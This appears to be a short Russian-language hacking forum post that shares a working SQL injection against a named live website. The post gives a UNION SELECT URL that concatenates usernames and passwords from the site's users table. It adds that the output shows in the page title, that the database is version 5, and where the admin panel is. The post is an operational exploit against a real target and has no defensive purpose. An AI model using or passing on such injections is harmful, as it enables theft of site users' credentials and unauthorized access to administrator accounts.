http://www.korkinskoe.ru/index.php?page_id=-1+union+se lect+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,concat(username,0x3a,password),19 ,20,21,22+from+korkino_users
Вывод в тайтле.
5 ветка.
Админка:
http://www.korkinskoe.ru/admin/
тиц 10
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot